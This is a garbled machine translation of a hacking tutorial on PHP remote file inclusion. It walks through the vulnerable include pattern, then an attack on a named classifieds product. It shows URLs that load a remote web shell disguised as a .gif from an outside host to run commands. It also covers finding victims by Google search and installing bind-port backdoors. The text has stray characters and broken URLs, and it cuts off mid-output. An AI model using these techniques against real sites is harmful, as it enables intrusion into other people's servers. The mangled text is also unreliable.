Remote file contains vulnerabilities using ************************************** AUTHOR: CRACKLOVE ** EMA! L: CRACKLOVE # zj.com * * Home: n / a, maybe down **************************** 1) What is the remote file contains a vulnerability? Let us first Take a look at the following code, Include ($ page); ?> Due to the lack of full filtering, it is not local to the local area of the $ PAGE. Or on the remote server, we can specify the file files for the remote server as a parameter to the $ PAGE variable, perform a remote file with web privileges. 2) The initial application of the vulnerability assumes that the index.php code of a certain site is as follows. Include ($ page); ?> We can submit: http://siteurl.tld/index.php? Page = http: // Remote Server / File name hypothesis? Switch 冻 冻 isz.php, content is System ("ls / tmp /"); ?> This will download the warez.php to the local, and execute! It is white, it is to display the files under TMP. 3) The actual exercise said a lot, now starting exercise, 嘿嘿. 1 Preparation: 1 There is a remote file containing a vulnerability site 2PhpsHell 3BackDoor for 1, everyone can go to www.cnns.net or www.securiteam.com to pay attention to the recent vulnerability, there will be, we take the most close ArtMedic Kleinanzeigen vulnerability. Atmedic Kleinanzeigen Since the $ Site variable of index.php lacks filtration, the remote file contains a vulnerability. So we can submit the following urlhttp: // artmedic kleinanzeigen url / path / index.php? Site = http: // phpshellurl How to find ArtMedic Kleinanzeigen Site? There is a tip here. I will talk about it in the official station of ArtMedic Kleinanzeigen first. RtMedic Kleinanzeigen program demonstration, just click on the connection, connected to http://siteurl.com/index.php?site =anzeigenmaerktestart, so? 蚩猤 Oogle.com, search index.php? site = anzeigenmaerktestart, those! use! ArtMedic Kleinanzeigen stands almost, we can try one by one! For 2, I recommend Data Cha0S PHP Command / SafeMode Exploit 4.1, or Angel's Saphpshell, phpspy, feature is good. For 3, you can use the binding port Program Bind, then use the port telnet that binds. You can use the Digit-Labs Connect-Back DOOR used before SAN, but I often use bindtty, bindtty binding 7474 port. (2) Start using 1 Submit HTTP: // XXX.DE/index.php?site=http://phphot.com/cse.gif?cmd=id Description, cse.gif is the Data Cha0s PHP Command / SafeMode Exploit 4.1, CMD = ID is above. Query the current user's permissions. Generally all UID = 99 (Nobody) GID = 99 (Nobody) Groups =